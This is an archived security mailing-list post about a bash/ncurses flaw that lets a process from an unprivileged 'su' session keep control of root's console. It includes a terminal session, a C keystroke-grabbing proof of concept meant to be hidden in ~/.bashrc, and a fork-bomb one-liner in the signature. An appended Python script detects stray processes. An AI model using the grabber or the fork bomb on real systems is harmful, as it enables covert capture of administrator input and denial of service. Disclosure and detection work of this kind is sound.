With bash 2.01 and ncurses 4.1, any program launched at an unprivileged uid (eg. from an 'su' shell) may take over the privileged user's console (to grab keystrokes or something else). I found it's quite easy when I tried to kill 'su' directly from the unprivileged shell with signal 9:

[root@genome /]# su lcam
[lcam@genome /]$ killall -9 su
Killed
[root@genome /]#

That was normal, but suddenly I saw the old prompt again:

[lcam@genome /]$

From this point, two bash instances (the unprivileged one hasn't been killed with su!) were controlling my console at once... It looks just curious:

[root@genome /]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[lcam@genome /]$ id
uid=502(lcam) gid=502(lcam) groups=502(lcam)
[lcam@genome /]$
[root@genome /]#

Of course, it isn't so scary, because it has been done manually... But it can be easily used in a nasty program. A typical administrator believes that only the unprivileged account may be compromised when he's launching something on it, and usually he's right, but ncurses has a vulnerability which may be used to fool him. Unlike other lame su tricks, it's quite invisible (he may check on a second console - he's back in his REAL, root shell, but we can still control his console). I wrote a simple program (it may even be launched from ~/.bashrc; in the meantime, su should be killed), which is able to grab keystroke(s) from the console:

-- test.c --
// gcc test.c -lncurses -oanything
#include <curses.h>
#include <stdlib.h>   /* for system() */

int main(void)
{
    initscr();   /* take over the terminal through ncurses */
    noecho();    /* don't echo what is typed */
    raw();       /* pass every key through, no line buffering or signal keys */
    while (1)
        if (getch() == 'x')           /* proof of concept: react to one key */
            system("touch /tmp/VOILA");
}
-- eof --

It isn't perfect, actually it grabs only one of the first 'x's, and fails to grab the next ones (a lot of i/o errors when debugged ;-). But it CAN do that. For sure it's possible to keep control much longer, as shown above (bash example). Maybe it's possible to do it even after logout, I haven't checked it.
_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
To iterate is human, to recurse divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
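A console owner's check for the condition described in the post, as an added example that is not part of the original message: it reads output in the shape of `ps -eo user,pid,ppid,pgid,sid,tty,comm` (column order is assumed; the sample is constructed to mirror the session above after su has been killed) and flags processes still attached to the console that belong to another user or have been reparented to init.

```python
"""Flag processes left attached to a console after 'su' has exited.

Added example, not code from the original post. Input is assumed to be in
the shape of `ps -eo user,pid,ppid,pgid,sid,tty,comm` (procps column order).
"""

COLUMNS = ("user", "pid", "ppid", "pgid", "sid", "tty", "comm")

# Constructed sample (not real output): root's console on tty1 right after
# `killall -9 su`. The lcam shell (599) has been reparented to init yet still
# holds the terminal, and its child (733) is the ncurses key grabber.
SAMPLE_PS = """\
USER       PID  PPID  PGID   SID TT       COMMAND
root       412   410   412   412 tty1     bash
lcam       599     1   599   412 tty1     bash
lcam       733   599   733   412 tty1     anything
root       801   412   801   412 tty1     ps
"""


def parse_ps(text):
    """Turn ps output into a list of dicts keyed by COLUMNS; the header is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split(None, len(COLUMNS) - 1)   # comm may contain spaces
        if len(fields) == len(COLUMNS):
            rows.append(dict(zip(COLUMNS, fields)))
    return rows


def stray_processes(rows, tty, owner):
    """Return (pid, reason) for processes on `tty` the console owner did not
    expect: owned by a different user, or orphaned (ppid 1) while holding the
    tty. Each of them can still read and write the terminal alongside the
    owner's shell, which is exactly what the post demonstrates."""
    found = []
    for r in rows:
        if r["tty"] != tty:
            continue
        if r["user"] != owner:
            found.append((r["pid"], "owned by " + r["user"]))
        elif r["ppid"] == "1":
            found.append((r["pid"], "orphaned, still on " + tty))
    return found


if __name__ == "__main__":
    for pid, why in stray_processes(parse_ps(SAMPLE_PS), "tty1", "root"):
        print(pid, why)
```

On a live system the same check is `ps -o user,pid,ppid,pgid,sid,tty,comm -t $(tty)` run from the root shell after su returns; any row that is not your own session deserves a look.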
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:36 PDT